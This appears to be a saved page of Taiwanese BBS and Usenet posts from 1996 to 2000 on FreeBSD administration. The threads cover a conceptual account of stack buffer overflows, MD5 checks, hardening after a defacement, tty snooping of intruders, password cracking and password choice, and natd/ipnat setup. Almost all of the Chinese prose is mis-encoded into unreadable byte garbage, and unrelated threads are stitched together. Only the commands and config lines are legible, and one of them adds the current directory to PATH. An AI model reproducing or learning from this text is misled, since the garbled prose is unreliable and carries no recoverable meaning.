»¡¤å¸Ñ¦r: ¦ó¿× buffer overflow



--------------------------------------------------------------------------------



§@ªÌ: tmg (®üÃäº}¨Óªº..®ü¼S) ¬ÝªO: SobVersion

¼ÐÃD: »¡¤å¸Ñ¦r: ¦ó¿× buffer overflow

®É¶¡: Wed Nov 13 20:50:24 1996





­ü....... buffer overflow ³o­Ó¬}, ¤j·§¬O³ÌÃø¨¾³Æªº¤@­Ó¬},

¦]¬°³o­Ó¬}µo¥Íªº­ì¦]¯Âºé¬O¦]¬°µ{¦¡ªº bug,

¦Ó³oºØ bug §A§Ú¤T¤£¤­®É´N·|¥Ç³oºØ¿ù, «D±`Ãø¥H¦b coding ®É´N¥[¥H¨¾³Æ¡C

­n¨¾¤î³oºØ¬}, ¥u¦³«D±`¤p¤ß¥J²ÓÀˬd code........



³oºØ¬}, ÅU¦W«ä¸q, ´N¬O§Q¥Î buffer overflow ªº­ì²z¹F¦¨¥Øªºªº......

¤ñ¦p, ¤@­Ó°}¦C¥u¦³ 100 bytes, ¦ý§ÚÁýµ¹¥¦ 200 bytes ªº¸ê®Æ,

©ó¬O³o­Ó°}¦C¸Ë¤£¤U³o¨Ç¸ê®Æ, ³y¦¨¤F overflow......



¬°¤°»ò overflow ·|¦³ security hole ©O?

­º¥ý, overflow µo¥Í®É, ¦h¥X¨Óªº¸ê®Æ·|»\¨ì¨ä¥¦ÅܼƤW,

¬Û«H³o¤@ÂI¤j®a¦­´Nª¾¹D¤F¡C



°ÝÃD¬O, ¬°¤°»ò¸ê®Æ»\¨ì¨ä¥¦ÅܼƤW®É, ³»¦h¨Ïµ{¦¡°õ¦æ¿ù»~,

·|ÄY­«¨ì¥X²{ security ªº°ÝÃD¶Ü? ³o®É, ¦nª±ªº¨Æ±¡´Nµo¥Í¤F.......



·í§Ú­Ì©I¥s¤@­Ó function ®É, ¥H²Õ¦X»y¨¥ªºÆ[ÂI,

·|±N return address °ï¤J stack ¤¤¡C

¦pªG³o­Ó function «Å§i¤F¤@¨Ç local ÅܼÆ,

¨º¶i¤J³o­Ó function ¤§«á, ·|¦b stack ¤¤¦AªÅ¥X¤@¶ô°Ï°ìµ¹³o¨Ç local ÅܼÆ,

·í­n±q³o­Ó function return ¦^¥h®É, ´N§â³o¨Ç¦b stack ¤¤ªº local ÅܼƲM±¼¡C



²{¦b¦n¤F, buffer overflow security hole ´N¬O¦b³o¸Ìµo¥Í¤F.......



¦pªG¦³¬Y­Ó function «Å§i¤F¤@­Ó local array, ¦p:



int func() {

  int i, j, k;

  char buf[16];

  struct abc *x, *y, *z;

      .

      .

      .

}



³o®É, ·í³o­Ó function ³Q©I¥s®É, stack ¤¤ªºªø¹³´N¹³:



                               +-----------------------+

current stack pointer ---->    | (other variable)      |

                               +-----------------------+

                               | buf (16 bytes)        |

                               +-----------------------+

                               | (other variable)      |

                               +-----------------------+

                               | some system data      |

                               +-----------------------+

                               | return address of     |

                               | this function         |

                               +-----------------------+

                               | (other data in stack) |

                               |           .           |

                               |           .           |

                               |           .           |



¶â..... ³o¼Ë´N«Ü©úÅã¤F, ¦pªG¦b³o­Ó function ¤º¦³¤F bug, §Ñ°O¥h±±¨î

¸ê®ÆÁýµ¹ buf ªºªø«×, ¨º..... ·í§Ú¸ê®ÆÁýªø¤@ÂI, ´N¥i¥H»\¨ì³o­Ó

function ªº return address ¤F..........



³o®É, §Ú¦bÁý¸ê®Æµ¹ buf ®É, ¶¶«K±N­n°õ¦æªº¾÷¾¹½XÁý¶i¥h,

·íÁý¨ì function ªº return address ®É, ´N§â return address

«ü¨ì¦Û¤v©ÒÁý¶i¥hªº code ¤W......

³o®É, function °õ¦æ§¹²¦, ­n return ®É, ¼K¼K¼K,

¥¦´N¤£·| return ¨ì­ì¨Ó©I¥s¥¦ªº¦a¤è, ¦Ó·| "return" ¨ì§Ú©ÒÁý¶i¥hªº¨º¨Ç code...

³o®É, ´N¥i¥H¬°©Ò±ý¬°¤F....... ¬Ý§Ú°ª¿³·R«ç»ò°µ´N«ç»ò°µ¤F..........



³o¹ê¦b¦³ÂI¥i©È, ¦]¬°³oºØ¬}¯Âºé¬Oµ{¦¡µo®iªÌªº "²¨¥G",

¤£ºÞ¨t²ÎºÞ²z¦A§¹µ½, ¤@¦ý¨Ï¥Î¤F³oºØµ{¦¡, ´Nµ¥©ó¶}¤F¤@­Ó¬}.......

¦³³oºØ¬}ªºµ{¦¡ÁÙ¤£¤Ö, ¤ñ¦p¦­´Áªº fingerd, sendmail 8.6.xxx, Xt...... µ¥.....

¹J¤W³o°ÝÃD, °£¤F»°§Ö§ä·sª©µ{¦¡¦^¨Ó compile ¥~,

ÁÙ­n¬èë¦b§Aµo²{³o­Ó¬}¤§«e¨S¦³ hacker ¨ÓÆp¹L³o­Ó¬}........

.

¦p¦ó½T©w§Ú§ìªºISOÀɬO¥¿½Tªº!

 

--------------------------------------------------------------------------------



¡° ¤Þ­z¡mchuyow@ms24.hinet.net (chuyow)¡n¤§»Ê¨¥¡G

> ªñ¤é­è±qfreebsd.csie.nctu.edu.tw§ì¤F4.0-install.iso,¦b¬Û¦P¥Ø¿ýùØÁÙ¦³¤@­Ó

> checksum.md5,½Ð°Ý§Ú­n¦p¦ó¥h°µÅçÃÒªº¤u§@!

>                                               Freebsd·s¤â

  ¨Ï¥Î md5 ¥h check °²¦p md5 4.0-install.iso ¸ò checksum ¤@¼Ëªº¸Ü¥NªíÀɮרS¦³¿ù

--

¡° Origin: ºô¸ôÃäÅu [linux.twbbs.org] 

¡» From: cnpa-1.admin.yzu.edu.tw

½Ð°Ý ./

 

--------------------------------------------------------------------------------



¡° ¤Þ­z¡mchiueh.bbs@bbs.cs.nthu.edu.tw (hahahhaa)¡n¤§»Ê¨¥¡G

> §Ú­è¸Ë¦nFreebsd,Maplebbs

> ¦ý§Úµo²{¥u­n¬O°õ¦æÀÉ¿ú³£­n¥[./¤~¯à°õ¦æ

> ½Ö¥i¥H±Ð§Ú§â³o­Ó²{¶H¥h°£!!

> please!!



³o¬O security ¤WªºÅU¼{¡A¦pªG§A¯uªº·Q­n³o¼Ë°µªº¸Ü¡A¦b§Aªº .cshrc ©Î¬O

¬ÛÃöªºÀɮ׸̭±©ñ¤J¡G



set path = ($path . )



--

                                      ²öÅ¥¬ïªL¥´¸­Án¡A¦ó§«§u¼S¥B®}¦æ¡C

                                ¦Ë§ú¨~¾c»´³Ó°¨¡A½Ö©È¡H¤@»b·Ï«B¥ô¥­¥Í¡C

                                ®Æ®k¬K­·§j°s¿ô¡A·L§N¡C¤sÀY±×·Ó«o¬Ûªï¡C

                                ¦^­º¦V¨Ó¿½·æ³B¡AÂk¥h¡A¤]µL­·«B¤]µL´¸¡C



                                          ¢wĬªF©Y¡u©w­·ªi¡A¹J«B«á´¸¡v

--

¡° Origin: ¤p³À³À (Deer.abpe.org) From: infomath.math.nctu.edu.tw

³QÀb«È¤J«I

 

--------------------------------------------------------------------------------



On Fri, Jun 09, 2000 at 04:00:32AM +0000, tsguu@ms1.hinet.net wrote:

> §Ú­Ìªººô­¶´X¤Ñ«e³Q¬Y¦ìÀb«È¤J«I¤F¡A¤£¹L¥L¥u¬O´«±¼­º­¶¡A¨Ã¨S¦³°µ¨ä¥Lªº¨Æ¡C

> §Ú­Ìªº¥D¾÷¬O486DX-50,32Mb¡A¨t²Î¬OFreeBSD 2.2.8 stable¡A§Ú¤£·Q´«¨t²Î

> ¦¨3.x©Î4.x¡C½Ð°Ý­nª`·N­þ¨Ç¨Æ?

netstat -afinet | grep LISTEN

¬Ý¬Ý¦³¦h¤Ö­Ó, §â¤£¶·­nªºÃö¤F§a ..

(£°, µ²ªG´N¤£¥Î¶K¨ìª©¤W¤F)



or, ¦pªG¥u¬O®³¨Ó°µ web server, ¤£¥é¥u¯d httpd ©M sshd¡C

sshd ¤£­n¥þ³¡¶}©ñ, ¦Ó­n¥uµ¹¬Y¨Ç¾÷¾¹¯à°÷ login¡C



¦pªG±z®É¶¡«Ü¦h, ©Î³\¥i¥H°Ñ¦Ò¬Ý¬Ý¦HªÌ«Ü¤[¥H«eĶªº¤å³¹:

http://water.ite.ntnu.edu.tw/doc/cfbhow2.txt



--

CirX - This site doesnt' exist.

9c  k9o h9 s1bg s1f, 7v  .y xqx a  sj m8r ffg1 vg5 a6 asox tmul h38.

ant sj m8r ob ? 1fj mwby a1 tao vg5. soq df v' .a. CirX.

½Ð°Ý¤@­ÓºÊ±±°ÝÃD

 

--------------------------------------------------------------------------------



¡m ¦b skyo.bbs@mis.mgt.ncu.edu.tw (^-^Y) ªº¤j§@¤¤´£¨ì: ¡n

: ¡° ¤Þ­z¡mcharme.bbs@bbs.cs.nthu.edu.tw (Dangerous)¡n¤§»Ê¨¥¡G

: :         °²¨Ï¨t²ÎÁV¤J«I

: :         §Ú­Ì¦p¦ó¥h¬ö¿ý¤U¤J«IªÌ°µ¹L¨º¨Ç¨Æ,°Ê¹L¨º¨ÇÀɮשO?

: :         ¤S¦pªG§Ú¨t²ÎºÞ²zªÌ­è¦n¦b½u¤W

: :         ¤£kill±¼¤J«IªÌªºprocess,¦p¦ó°lÂܤJ«IªÌ¥Ø«e¦b°µ¤°»ò¨Æ©O?

: ±N rc.conf ¥[¤@¦æ accounting_enable="YES"¡A§A´N¥i¥H¥Î lastcomm

: ¬Ý©Ò¦³¤H¥Î¹Lªº«ü¥O¡C

: ¥Î tty snoop ¥i°µ¨ì°lÂܤJ«IªÌ¥Ø«e¦b°µ¤°»ò¨Æ¡C

: ¤èªk¬O¡G

:         1. ¦b kernel ³]©w¥[¤J

:            pseudo-device   snp     3  #Snoop device - to look at pty/vty/etc..

:            ¨Ã­«¸Ë kernel¡C

:         2. ¦b /dev ¤U ./MAKEDEV snp3

:         3. ¦A¨Ó´N¥i¥H¥Î watch «ü¥OºÊµø¤F¡Ae.g. watch ttyp2¡C



:   §c...§Ú·Ó°µ«á..¤]½s§¹ kernel «á­«¶}¾÷¤F....

:   watch ttyp0 ÁÙ¬O·|¥X²{ watch: fatal: cannot open snoop device



# cd /dev

# ./MAKEDEV snp0 snp1 snp2



     man watch



     (control-G)

           Exit watch.

     (control-W)

           Clear screen.

     (control-X)

           Change attached tty.

           

--

¡° ¨Ó·½:¡E³J±²¼s³õ bbs.tku.edu.tw¡E[FROM: 163.13.240.20]

½Ð±Ð¦³ÃöSNPªº°ÝÃD

 

--------------------------------------------------------------------------------



On Sun, Jun 25, 2000 at 05:28:17PM +0000, ¤Ñ¤W­¸ªº wrote:

>

> §Ú¦bsnp0.91ªº¦w¸Ë³]©ú¸Ì­±ªºetc-example/services¬Ý¨ì³o¤@¬q...

> §Úı±o¦³¨Ç©Ç©Çªº»¡...

> §Ú¬Ý¹L§Úªº/usr/local/libexec/¸Ì­±

> ¨S¦³tcpd­C....

¶â, §â /usr/local/libexec/tcpd ·F±¼.. ¹³¬O vi[m] ´N

:%s,/usr/local/libexec/tcpd,,g



> ¬O¤£¬O´N¬O¦]¬°³o¼Ë¡A¨C·íptelnet³s¶i¨Ó®É´N·|³y¦¨Â_½uªº¥D­n­ì¦]©O?

> ¬O§ÚBSDª©¥»ªº°ÝÃD¶Ü?

> ¤S¡A¤£ª¾¹D¸Ó«ç»ò¸Ñ¨M...

½Ð csie.nctu ª½±µ -lwrap ?

³o¼Ë¤l´N¥i¥Hª½±µ§Q¥Î /etc/hosts.allow ¤F...



> ÁÂÁÂ!

> FreeBSD 3.4 Release

>

> ptelnet  stream  tcp  nowait  root  /usr/local/libexec/tcpd

/usr/local/snp/libexec/ptelnetd

> prlogin  stream  tcp  nowait  root  /usr/local/libexec/tcpd

/usr/local/snp/libexec/prlogind

> pftp     stream  tcp  nowait  root  /usr/local/libexec/tcpd

/usr/local/snp/libexec/pftpd

> ppasswd  stream  tcp  nowait  root  /usr/local/libexec/tcpd

/usr/local/snp/libexec/ppwdd

>



--

CirX - This site doesnt' exist.

9c  k9o h9 s1bg s1f, 7v  .y xqx a  sj m8r ffg1 vg5 a6 asox tmul h38.

ant sj m8r ob ? 1fj mwby a1 tao vg5. soq df v' .a. CirX.

½Ð°Ý­n¦p¦óÀ˵øUSERªº±K½X©O

 

--------------------------------------------------------------------------------



刴X (slime.bbs@tropic.med.kmu.edu.tw) wrote in message

news:3b9OPM$WqB@tropic.med.kmu.edu.tw...

> ¡° ¤Þ­z¡madimit.bbs@bbs.cs.nthu.edu.tw (Comealittlecloser)¡n¤§»Ê¨¥¡G

> : ¦L¶H¤¤¤£¬O¥i¥H¿ï¾Ü¬O§_¹ï±K½X¶i¦æ¾B¸n¶Ü?

> : ¥u­n¬Oroot´N¦³Åv­­¬Ý©Ò¦³ªº¤F§a? ^^;

> ±z¬O»¡ shadow ¶Ü?

> ¨S¦w¸Ë shadow ¬O©ñ /etc/passwd ,

> ¦w¸Ë shadow §ï©ñ /etc/shadow ,

> ¥i¬O¤£ºÞ©ñ­þ....³£¬O"½s½X«áªº"±K½X.

> ´Nºâ¯à¬Ý¨ì¤]«ÜÃø¤Ï±À.





ÁöµM Linux ªº±K½X¬O¥Î one-way hash ªº¤è¦¡¨Ó¥[±K±K½X¡M

³o¼Ë¥Î¤Ï±Àªº¤èªk¬O«ÜÃø°Õ¡C



¦ý±z¥i¥H³v¤@¿é¤J±K½X¡MµM«á¬Ý¥[±K«áªºµ²ªG¬O§_©MÀɮפWªº¤@­P¡M¤]´Nª¾¹D¬O§_­ì±K

½X¤F¡C



³oºØ¤èªk¡M´N¬OµÛ¦Wªº¦r¨å¯}¸Ñªk©M¼É¤O¯}¸Ñªk¡C



©Ò¥H¡M³]©w¤@­Ó±j¶´Ãø²qªº±K½X¦b¦w¥þ¤W«D±`­«­n¡R

1¡M±K½Xªø«×³Ì¦nªø¨Ç

(¦bMS Windows ¤¤ªº±K½Xªø«×¡M­n»ò¬O 7 ­n»ò¬O 14 ¡C³o¬O¦³­ì¦]ªº¡R¦]¬° MS

Windows ªº±K½X¥[±K¦]¦Ò¼{¨ì¥H©¹¨t²Îªº­Ý®e©Ê¡M©Ò¥HÁÙ«O¯dµÛ LanMAN ®É¥Nªº¥[±K¤è

ªk¡M¤]´N¬O¥Î 7 ­Ó¦r¤¸¬°³æ¦ì¡M¦pªG¤£°÷ªø¡M«h¦b«á­±¸É 0 (ÁÙ¬O¨ä¥¦¤°»ò¼Æ¦rªº¡M

§Ñ¤F)¡C¦pªG¶W¹L 7 ¡M«h¦A¨Ï¥Î§Ì¤G­Ó³æ¦ì¡C³o¼Ë¡M¸É¥Rªº³¡¥÷³£«Ü®e©ö¯}¸Ñ(¦]¬°¥¦

­Ì¬O³sÄò¦r¤¸ªºÃö«Y)¡M¦Ó¤@­Ó³æ¤¸¤¤³Ñ¤Uªº³¡¥÷ªø«×´N¦³­­¤F¡M­n¯}¸Ñ¥¦¬Û¹ï¤]¤ñ¸û

®e©ö¡C¦pªG±q²Ä¤G­Ó³æ¤¸¤¤²q¨ìªº±K½X¬O¡RFT01¡M¨º»ò¸Õ¸Õ¥Î MICROSO ²q²Ä¤@­Ó³æ¤¸

¬Û«H´N«Ü®e©ö¤F¡C)

2¡M¤£­n¥Î²{¦¨³æµü¨Ó°µ±K½X¡M­è¤~ªº¨Ò¤l´N¬O·¥¦nªº¤è­±±Ð§÷¡C

3¡M±K½X³Ì¦n¥]¬A¤j¼g©M¤p¼g¦r¥À¡N¼Æ¦r¡N©M²Å¸¹ªº²Õ¦X¡C

4¡M©w´Á§ó´«±K½X¡C

5¡M¤£­n­«½Æ¨Ï¥Î¥H©¹ªº±K½X¡C



¨º»ò¡MªB¤Í­Ì©Î³\ı±o±K½X«Ü®e©ö§Ñ°O¡C



¸Ñ¨M¤èªk¬O¨Ï¥Î¤@¨Ç¦Û¤vª¾¹D¡M§O¤HÃø²qªº¦W¦r©M¼Æ¦r°µ¡§ºØ¤l¡¨¡M³q¹LÅܧΪº¤è¦¡¨Ó

°µ±K½X¡C

¤ñ¦p¡M±z¥i¥H¥Î±z¨kªB¤Í©Î¤kªB¤Íªº¦W¦r¡M¦A¥[¤W¥Lªº¥Í¤é©Î²Ä¤@¦¸¬Û¹J¤é´Á¨Ó°µºØ

¤l¡MµM«á±N¥L¦W¦rªº²Ä¤G©Î²Ä¤T­Ó¦r¥À¥h±¼¡M±N³Ì«á¤@­Ó¦r¥À°µ¤j¼g¡M¦A¥[¤W¤@­Ó¤ñ¸û

¤Ö¥Îªº²Å¸¹(¦p ^¡N>¡N[¡Nµ¥µ¥) ¡MµM«á¦A§â¨º¨Ç¼Æ¦r±µ¦b«á­±¡C³o¼Ë´N¦¨¤F¤@­Ó«ÜÃø

²qªº±K½X¤F¡M¦Ó¥B¹ï±z¨Ó»¡«o¬O¤£®e©ö§Ñ°Oªº¡C·íµM¡M°£¤F¨k¤kªB¤Í¥~¡M±z¤]¥i¥H¥Î¤÷

¥À¡N¤l¤k¡NÃdª«µ¥¦W¦r¨Ó°µ±K½XªººØ¤l¡C



ÁÙ¦³¡M§Úµo²{¥Î¾÷¨®©Î¨T¨®ªº¨®µP°µ±K½X¤]¤£¿ù°Õ¡M±N¨ä¤¤¤@­Ó­^¤å¦r¥À§ï¦¨¤p¼g´N¤w

¸g²Å¸¹¤½¥qªº­n¨D¤F¡C¦pªG¦AÀt¤ò¤@ÂI¡M§â¨º¨Ç¦r¥À©M¼Æ¦r«ö±Æ¦C¶¶§Ç©¹«á¥[1©Î2¤]¬O

­Ó¤£¿ùªºª`·N¡C¨Ò¦p¡M±zªº¾÷¨®¸¹½X¬O LU-5240¡M±z¥i¥H±N¤§§ï¦¨ mV-6351¡M´N¬O¤@­Ó

¡§«j±j(¦]¬°¼Æ¦r¤Ó¦h)¡¨¦X²Å­n¨Dªº±K½X¤F¡C



¤èªk«Ü¦h°Õ¡M¦Û¤v®e©ö°O¡M§O¤HÃø²q´N¦æ¡C¤£­n¥H¬°¡§QWERTY6789¡¨ ³oºØ³sÄò«öÁä²Õ

¦X¡M©Î¬O±N¦Û¤vªº¦W¦r­Ë¹L¨Ó¼g¡M¬O­Ó¦n¥D·N®@¡M¦Ñ¨ìªº¯}¸ÑªÌ¤@¦­´N¬}±x³oºØÉ«­Ç

¤F¡C





--

======= http://go.to/study-area =======

­¸³·ªï¬K¨ì¡M­·«B°e¬KÂk

¤w¬O´H±V¦Ê¤V¦B¡M¤×¦³ªáªK«N

«N¤]¤£ª§¬K¡M¥u§â¬K¨Ó³ø

«Ý±o¤sªáÄ꺩®É¡M¥L¦bÂO¤¤¯º¡T

natdÂà§}ªA°ÈÁÙ¬O¥¢±Ñ!!...

 

--------------------------------------------------------------------------------



Frank Millers (fjj.bbs@vlsi1.iie.ncku.edu.tw) wrote:

> ¹ï¥~³¡¤Àed0:¬°1.2.3.4

> ¹ï¤º³¡¤Àed1:¬°192.168.1.1

> ¤º³¡¦³³]©wNatd server,¨Ã³]¦³DNS Server

> ¥Ø«e¥þ¤½¥q³£¥H¦¹¥xFreeBSD¥R·í Gateway¤Wºô¶¶§Q....

> ¤§«e,¤½¥q±Ä¥ÎISp©Ò´£¨ÑªºµêÀÀ¥D¾÷....·íweb server

> ¥Ø«e¤½¥q±ý©Ô¦^¦Ü¤º³¡¦Û¦æ¬[³]web server

> ©ó¬O­«·s¥[¤F¤@¥xWindows 2000+IIS 5.0 IP¦ì¸m¬O192.168.1.2 , 

> Gateway ³]©w192.168.1.1(¤]´N¬OFreeBSD¨º¥x)

> ¤p§Ìªº/etc/rc.firewall¥H¿í·Ó«e½úªº«ü¥Ü§ï¥¿¤F!!...

> ¥t¥~.natd«o¤£ª¾¹D«ü¥O¸Ó«ç»ò¤U??..



1. ipfw rule ¤¤°£¤F divert ¥H¥~¡A¥ý¤£­n¦³¥ô¦ó¨ä¥Lªº rule¡A¤ñ¤è»¡:

   0000 divert 8668 ip from any to any via ed0

   0100 allow ip from any to any

   ³o¼Ë¥i¥H±Æ°£ ipfw rule ¨S³]¦nªº±¡ªp

   

2. ¤â°Ê°õ¦æ /sbin/natd -interface ed0 -log -v -same_ports

   -redirect_port tcp 192.168.1.2:80 80

   ³o®É­Ô natd ·|¦b«e´º°õ¦æ¡A¨Ã·|¦C¥X©Ò¦³ªºÂà§}°Ê§@¡A¥J²Ó¬Ý¬Ý

   °w¹ï port 80 ªº°Ê§@

   

3. ¸ÕµÛ±q¥~­± telnet 1.2.3.4 80 ¬Ý¬Ý¡A­n¬O¤£¦æªº¸Ü¡A¬Ý¬Ý

   a) natd ¬O§_¦³¥¿½TªºÀ°§A§â x.x.x.x:port->1.2.3.4:80 ´«¦¨

      x.x.x.x:port->192.168.1.2:80

   b) ¦pªG¦³ªº¸Ü¡A§ä¤@¥x°Ïºô¤¤ªº UNIX ¥Î tcpdump port 80

      ¬Ý¤@¤U 192.168.1.2 ¬O§_¦³¥¿½T¦^À³«Ê¥]¡A¨Ò¦p¡G

      x.x.x.x:4321->192.168.1.2:80

      192.168.1.2:80->x.x.x.x:4321

   c) ­nª`·N 192.168.1.2 ¦^À³«Ê¥]¤]­n¸g¥Ñ 1.2.3.4¡A§_«h¥i¯à

      ·|Åܦ¨³o¼Ë¡G

      x.x.x.x:4321->192.168.1.2:80  (¸g¥Ñ 1.2.3.4 ¨Óªº)

      192.168.1.2:80->x.x.x.x:5678  (¤£¸g¥Ñ 1.2.3.4 °e¦^)

      ³o®É­Ô x.x.x.x ·|ı±o©_©Ç¡A©ú©ú¥Ñ port 4321 °e¥X¡A¬°¦ó¦³

      ²ö¦W¨ä§®ªº«Ê¥]¶]¨ì¨S¦³µ{¦¡±µ¦¬ªº port 5678¡A¨º´N·|³Q¥á±¼



-- 



                                          §õ «Ø ¹F (Jian-Da Li) !(¥æ¤j¸ê¤u)

                                          E-Mail :  (jdli@csie.nctu.edu.tw)

                                          http://jdli.tw.freebsd.org/

NAT + DHCP SERVER

 

--------------------------------------------------------------------------------



¡° ¤Þ­z¡mright.bbs@right.dorm-gd2.nctu.edu.tw (§Ö¼Ö¶§¥ú¦Ñ¦a¤è¹ï¥ý¥Í)¡n¤§»Ê¨¥¡G

> ¡° ¤Þ­z¡mCapacitor.bbs@openbazaar.net (¡ã)¡n¤§»Ê¨¥¡G

> :   dhcp + nat ¨S°ÝÃD, §Ú´N¬O³o¼Ë°µªº...

> §Úªºnatd¸òdhcp¤À¶}³£¥i¥H¶]

> °ÝÃD¬O¸Ó«ç¼ËÅý¨â­Ó¤@°_¶]¡H



  ¨º´N¤@°_°õ¦æ´N¦n¤F§r!



  °O±o natd ³Ì¦n¤ñ dhcpd ¦­°õ¦æ¤ñ¸û¦n...



  §Ú¤§«e¬O dhclient + natd + dhcpd °t¦X Cable ...

--

¡° Origin: ºô¸ôÃäÅu (linux.twbbs.org) 

¡» From: ms6.hinet.net

natdÂà§}ªA°ÈÁÙ¬O¥¢±Ñ!!...

 

--------------------------------------------------------------------------------



¡° ¤Þ­z¡mfjj.bbs@vlsi1.iie.ncku.edu.tw (Frank Millers)¡n¤§»Ê¨¥¡G

: «Ø¹F«e½ú:

:     ­º¥ý¥ý·P¿E±zªº¦^«H,¤p§Ì¿í·Ó±zªº¤èªk.....¥i¬O«oÁÙ¬OµLªkÂàIP...

: ©ó¬O¥G...¦A¦¸½Ð±Ð«e½ú....

: ¨Ã¥B±N§ÚªºÀô¹Ò¤@¨Ã±Ô­z©ó¤U!!....

: ¤p§Ìªº¤½¥q¦V¤¤µØ¹q«H¥Ó½Ð¤F128K±M½u...©Ò¤À°t¨ìªºIP¦ì¸m¦p¤U

: 1.2.3.XXX¦@255²ÕIP¥i¥Î...Net mask¬O255.255.255.0

: ¤º³¡IP±Ä192.168.1.XXX¦@255²Õ Netmask ¬O255.255.255.0

: ¨ä¤¤Router¬°IBM console³]©w...

: LAN³¡¤À;¬[³]¤@³¡FreeBSD¤W­±¸Ë³]¨â±i D-Link DE220ºô¥d¨â±i...

: ¹ï¥~³¡¤Àed0:¬°1.2.3.4

: ¹ï¤º³¡¤Àed1:¬°192.168.1.1

: ¤º³¡¦³³]©wNatd server,¨Ã³]¦³DNS Server

: ¥Ø«e¥þ¤½¥q³£¥H¦¹¥xFreeBSD¥R·í Gateway¤Wºô¶¶§Q....

: ¤§«e,¤½¥q±Ä¥ÎISp©Ò´£¨ÑªºµêÀÀ¥D¾÷....·íweb server

: ¥Ø«e¤½¥q±ý©Ô¦^¦Ü¤º³¡¦Û¦æ¬[³]web server

: ©ó¬O­«·s¥[¤F¤@¥xWindows 2000+IIS 5.0 IP¦ì¸m¬O192.168.1.2 ,

: Gateway ³]©w192.168.1.1(¤]´N¬OFreeBSD¨º¥x)

: ¤p§Ìªº/etc/rc.firewall¥H¿í·Ó«e½úªº«ü¥Ü§ï¥¿¤F!!...

: ¥t¥~.natd«o¤£ª¾¹D«ü¥O¸Ó«ç»ò¤U??..

: ©Ò¥H·Q½Ð±Ð«e½ú....±æ«e½ú¯àµ¹¤p§Ì«üÂI¤@.¤G...

: ¦A¦¸·P¿E±zªº¨ó§U.....

natd¦n¤[¨S¥Î¤F ¤£§Ï´«ipfilterªºipnat¨ÓÂà ²³æ©úÁA »yªk©öÀ´ :)

1. kernel¥[¤J

   options         IPFILTER                #ipfilter support

   options         IPFILTER_LOG            #ipfilter logging

   ¥Ñ©ó¬Obind¦bkernel¤º ©Ò¥H¤£¥Î©Èdaemon±¾ÂI



2. /etc/rc.conf¥[¤J

gateway_enable="YES"            # Set to YES if this host will be a gateway.



3. ²£¥Íipnatªº³]©wÀÉ /etc/ipnat.conf

# §â¥~³¡­n¨ìed0ºô¸ôµ¹1.2.3.4:80ªº«Ê¥] Â൹ 192.168.1.2:80

rdr ed0 1.2.3.4 port www -> 192.168.1.2 port www

# §â¤º³¡192.168.1.0/24ªº«Ê¥]¹ïÀ³¨ì1.2.3.4/32 ¥~­±¤~¬Ý±oÀ´

map ed0 192.168.1.0/24 -> 1.2.3.4/32

# ©ÎªÌ map ed0 192.168.1.0/24 -> 1.2.3.4/32 portmap tcp 10000:20000



4. ¦pªG§Ú¨SºÃº|ªº¸Ü¡A³Ì«á°õ¦æ ipnat -CF -f /etc/ipnat.conf À³¸Ó´NokÅo

PS: ¤º³¡­nftpªº¸Ü ­n¥ÎPASV MODE



¥H¤W¬O³Ì²³æªºª¬ªp ¥u¦³Åý¤@»OÂà¥X¥h"¦Ó¤w" :P





­nµ½¥Î¥~³¡1­ÓCLASS CªºIP ¥i¥H§Q¥Îip aliasªº¤è¦¡

/etc/rc.conf ¥[¤J

ifconfig_ed0_alias0="inet 1.2.3.1  netmask 0xffffffff"

ifconfig_ed0_alias1="inet 1.2.3.2  netmask 0xffffffff"

...



MAIL Server ¦¬«H

/etc/ipnat.conf

# ±N¤º³¡ 192.168.1.3 ´«¦¨ 1.2.3.1 ¨Ó¦¬«H

rdr ed0 1.2.3.1/32 port smtp -> 192.168.1.3 port smtp



FTP Server

# ±N¤º³¡ 192.168.1.4 ´«¦¨ 1.2.3.2 ¶}©ñFTP

rdr ed0 1.2.3.2/32 port 21 -> 192.168.123.4 port 21



.. ¾l¦¹Ãþ±À ·R«ç»òÂà´N¥i¥H«ç»òÂà :p

§ï³]©w«á ¥u­n¦A°õ¦æ¤@¦¸ ipnat -CF -f /etc/ipnat.conf ´N¦n¤F

¤£¹L¸òipfw¤@¼Ë­nª`·N¥ý«á¶¶§Ç¤@¼Ë¬Ofirst win



¥t¥~¤]¥i¥H°t¦Xsquid °µtransparent proxy¨Ó¶}·½¸`¬y ¸`¬ÙÀW¼e :)

squid.conf¥[¤J

httpd_accel_host virtual

httpd_accel_port 80

httpd_accel_with_proxy  on

httpd_accel_uses_host_header on

# PS. ³o¼Ë´N¤£¯à¶] www ¤F



## TransParent Proxy

rdr ed1 0.0.0.0/0 port www -> 127.0.0.1 port 3128



¥t¥~¦pªG¤º³¡¹q¸£«Ü¦hªº¸Ü «Øij±NedXªººô¸ô¥d ´«¦¨fxpXªº ·|í«Ü¦h



°Ñ¦Ò¸ê®Æ:

«ü¥O¥Îªk -> man ipnat

³]©wÀÉ -> man 5 ipnat

§@ªÌºô¯¸

http://coombs.anu.edu.au/~avalon/ip-filter.html

§ó¦hªº½d¨Ò

http://coombs.anu.edu.au/~avalon/examples.html#NAT



­Y¹J¨ì°ÝÃD ½Ð¦bªO¤W°Q½× ½Ð¤Å¦^µ¹³o­Ó«H½c ³o¬O±Mªù¥Î¨ÓÄé¤ô¤Î¦¬¼s§i«H¥Îªº :Q



Copyright (C) 2000 , By Yi-Hsiang Lin, All Right Reserved.



--

±q¤µ¤Ñ°_ §A¤£¦A¾Ö¦³¦U¤H¯S¦â ¤£±o©Û¤Þ®Ç¤Hª`¥Ø ·í§A²{¨­®É ¹J¨£§Aªº¤H³£¤£´_°O¾Ð

§A¬O¶Ç¨¥¤¤ ¦ü´¿¬ÛÃѪº¤Hª« ®Ì²´§Y³u §A¤£¦s¦b ±q¥¼¥X¥Í

°Î¦W¬O§Aªº¦W¦r ½pÀq¬O§Aªº»y¨¥ §A¤w¤£¬OªÀ·|ªº¤@¥÷¤l §A¶W¶V¤F ³Ì°ªªº¶¥¼h

§Ú­Ì¬O"¥L­Ì" §Ú­Ì¬O"¤W¯Å" §Ú­Ì¬O¶Â¦ç¤H



--

¡° Post by test from Free.NHCTC.edu.tw ...

natd¤UªºPC¯à¶]battle.net and netmeeting¶Ü?..

 

--------------------------------------------------------------------------------



¡° ¤Þ­z¡mmchang@3tec.com (Mike Chang)¡n¤§»Ê¨¥¡G

> §A¥i¥H±Ò¥Î Samba ªº WINS ¤ä´©¡AµM«á¦b©Ò¦³ªº¤u§@¯¸±N

> WINS Server ³]¨ì§A FreeBSD ªº IP ´N¥i¥H¡Csmb.conf À³¸Ó­n¦³¡G

>     interfaces = 192.168.1.0/24 192.168.2.0/24

